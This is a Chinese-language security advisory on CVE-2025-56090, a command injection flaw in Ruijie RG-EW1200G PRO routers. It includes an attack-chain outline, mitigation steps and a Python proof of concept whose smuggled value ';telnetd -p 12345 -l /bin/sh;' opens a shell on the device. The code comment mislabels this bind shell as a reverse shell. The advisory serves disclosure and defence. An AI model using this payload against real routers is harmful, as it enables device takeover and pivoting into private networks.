CVE-2025-56090 锐捷RG-EW1200G PRO OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56090

漏洞类型

OS命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie RG-EW1200G PRO

漏洞概述

CVE-2025-56090是锐捷网络技术有限公司生产的RG-EW1200G PRO无线路由器中存在的高危安全漏洞。该漏洞影响该设备的V1.00、V2.00、V3.00和V4.00多个固件版本。漏洞根源在于设备Web管理界面中的config_retain.lua脚本文件存在命令注入缺陷，攻击者可通过向module_set接口发送精心构造的POST请求，在服务器端注入并执行任意操作系统命令。由于该漏洞无需高权限认证即可利用，且对机密性、完整性和可用性均造成严重影响，因此CVSS评分达到8.8分，属于高危漏洞。攻击者成功利用此漏洞可完全控制受影响设备，执行任意代码、窃取敏感信息或将其作为进一步攻击内网的跳板。

技术细节

该漏洞为典型的OS命令注入（OS Command Injection）漏洞，存在于RG-EW1200G PRO路由器的Web接口处理模块中。具体位置位于/usr/local/lua/dev_config/config_retain.lua文件中的module_set端点。漏洞成因是应用程序在处理用户输入时，未对外部输入进行充分的命令注入过滤，将用户可控的数据直接拼接到系统命令执行函数中。攻击者可在POST请求的参数中嵌入恶意命令分隔符（如分号、管道符等）和系统命令，服务器在解析该请求时会将攻击者的命令作为系统命令的一部分执行。由于该路由器的Linux嵌入式系统特性，攻击者可利用busybox等工具执行各种系统操作，包括文件读写、网络配置、进程管理等低权限操作。建议通过源码审计确认具体参数位置和过滤机制缺失情况。

攻击链分析

STEP 1

步骤1

攻击者发现目标路由器为锐捷RG-EW1200G PRO设备，并识别其Web管理界面地址

STEP 2

步骤2

攻击者构造包含恶意命令的POST请求，针对/module_set接口，payload中嵌入系统命令

STEP 3

步骤3

服务器端config_retain.lua脚本接收请求，由于缺乏输入过滤，攻击者注入的命令被拼接到系统命令中执行

STEP 4

步骤4

攻击者成功在路由器上执行任意命令，可获取root权限，完全控制设备

STEP 5

步骤5

攻击者可进一步利用该设备作为跳板攻击内网其他设备，或部署后门程序持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-56090 PoC - Ruijie RG-EW1200G PRO OS Command Injection
# Target: /usr/local/lua/dev_config/config_retain.lua
# Endpoint: module_set

target_ip = "192.168.XX.XX"  # Replace with target router IP
target_url = f"http://{target_ip}/cgi-bin/luci/api/module_set"

# Malicious payload - injects command to create reverse shell
payload = {
    "module": "config_retain",
    "action": "set",
    "data": ";telnetd -p 12345 -l /bin/sh;"  # Command injection payload
}

try:
    print(f"[*] Sending exploit to {target_url}")
    print(f"[*] Payload: {payload}")
    
    response = requests.post(target_url, data=payload, timeout=10)
    
    print(f"[*] Status Code: {response.status_code}")
    print(f"[*] Response: {response.text}")
    
    if response.status_code == 200:
        print("[+] Exploit sent successfully!")
        print("[+] Check if telnet service is running on port 12345")
    else:
        print("[-] Exploit may have failed")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

Ruijie RG-EW1200G PRO V1.00

Ruijie RG-EW1200G PRO V2.00

Ruijie RG-EW1200G PRO V3.00

Ruijie RG-EW1200G PRO V4.00

防御指南

临时缓解措施

建议立即采取以下临时缓解措施：1）将RG-EW1200G PRO设备从公网可访问范围移除，仅允许内网授权用户访问；2）在上游防火墙或路由器上实施访问控制策略，阻断对设备管理端口（80/443）的非授权访问；3）监控设备日志关注异常的module_set接口调用；4）如条件允许，考虑暂时更换为其他品牌设备，待官方发布正式补丁后再重新部署；5）加强网络分段，将物联网设备与核心业务网络隔离。